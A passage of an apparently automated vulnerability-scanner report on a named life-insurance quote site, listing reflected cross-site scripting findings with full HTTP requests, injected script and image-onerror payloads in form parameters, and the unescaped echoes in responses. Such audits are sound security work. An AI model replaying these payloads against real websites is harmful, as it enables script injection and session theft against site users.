Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:17'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44644


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" name="FaceAmountID" id="FaceAmountID" value="198724b"><script>alert(1)</script>5076b283d0edc1a56" />
...[SNIP]...

1.9. http://www.accuquotelife.com/apply.cfm [FaceAmountValue parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the FaceAmountValue request parameter is copied into the HTML document as plain text between tags. The payload e4af7<img%20src%3da%20onerror%3dalert(1)>4b7c722878fb3de58 was submitted in the FaceAmountValue parameter. This input was echoed as e4af7<img src=a onerror=alert(1)>4b7c722878fb3de58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000e4af7<img%20src%3da%20onerror%3dalert(1)>4b7c722878fb3de58&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 18 Aug 2011 14:38:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Pragma: no-cache
Expires: Sun, 18 Sep 2011 23:59:59 GMT
Expires: {ts '2011-08-18 09:38:42'}
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Parameter 1 of function DollarFormat which is now 1000000e4af7<img src=a onerror=alert(1)>4b7c722878fb3de58 must be a number
</h1>
...[SNIP]...

1.10. http://www.accuquotelife.com/apply.cfm [FirstName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the FirstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90a92"><script>alert(1)</script>bdcef59e46c10cc14 was submitted in the FirstName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss90a92"><script>alert(1)</script>bdcef59e46c10cc14&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:11 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:11'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 42698


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input name="FirstName" id="FirstName" type="text" size="20" maxlength="50" value="xss90a92"><script>alert(1)</script>bdcef59e46c10cc14" />
...[SNIP]...

1.11. http://www.accuquotelife.com/apply.cfm [Health parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the Health request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cbcd"><script>alert(1)</script>5ceb21cadfd4f012c was submitted in the Health parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=4777cbcd"><script>alert(1)</script>5ceb21cadfd4f012c&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:14 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:14'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 42698


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" name="Health" id="Health" value="4777cbcd"><script>alert(1)</script>5ceb21cadfd4f012c" />
...[SNIP]...

1.12. http://www.accuquotelife.com/apply.cfm [LastName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the LastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fe7f"><script>alert(1)</script>9634d99d571dc08e5 was submitted in the LastName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd1fe7f"><script>alert(1)</script>9634d99d571dc08e5&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:12 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:12'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 42698


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input name="LastName" id="LastName" type="text" size="20" maxlength="50" value="cdd1fe7f"><script>alert(1)</script>9634d99d571dc08e5" />
...[SNIP]...

1.13. http://www.accuquotelife.com/apply.cfm [LeadQuoteID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the LeadQuoteID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1634"><script>alert(1)</script>d7be42a38ee2b9188 was submitted in the LeadQuoteID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465f1634"><script>alert(1)</script>d7be42a38ee2b9188&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:44 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:44'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44644


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" id="LeadQuoteID" name="LeadQuoteID" value="8589465f1634"><script>alert(1)</script>d7be42a38ee2b9188" />
...[SNIP]...

1.14. http://www.accuquotelife.com/apply.cfm [Premium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the Premium request parameter is copied into the HTML document as plain text between tags. The payload 275fe<img%20src%3da%20onerror%3dalert(1)>e5679cd338f8db5e3 was submitted in the Premium parameter. This input was echoed as 275fe<img src=a onerror=alert(1)>e5679cd338f8db5e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000275fe<img%20src%3da%20onerror%3dalert(1)>e5679cd338f8db5e3&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 18 Aug 2011 14:38:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Pragma: no-cache
Expires: Sun, 18 Sep 2011 23:59:59 GMT
Expires: {ts '2011-08-18 09:38:34'}
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value "1105.0000275fe<img src=a onerror=alert(1)>e5679cd338f8db5e3" cannot be converted to a number
</h1>
...[SNIP]...

1.15. http://www.accuquotelife.com/apply.cfm [Premium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the Premium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99fe0"><script>alert(1)</script>0dfcb19f8e136299d was submitted in the Premium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.000099fe0"><script>alert(1)</script>0dfcb19f8e136299d&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 18 Aug 2011 14:38:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Pragma: no-cache
Expires: Sun, 18 Sep 2011 23:59:59 GMT
Expires: {ts '2011-08-18 09:38:27'}
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" name="Premium" id="Premium" value="1105.000099fe0"><script>alert(1)</script>0dfcb19f8e136299d" />
...[SNIP]...

1.16. http://www.accuquotelife.com/apply.cfm [Product parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the Product request parameter is copied into the HTML document as plain text between tags. The payload a99ec<a%20b%3dc>0eee69f868e was submitted in the Product parameter. This input was echoed as a99ec<a b=c>0eee69f868e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /apply.cfm HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Content-Length: 499
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

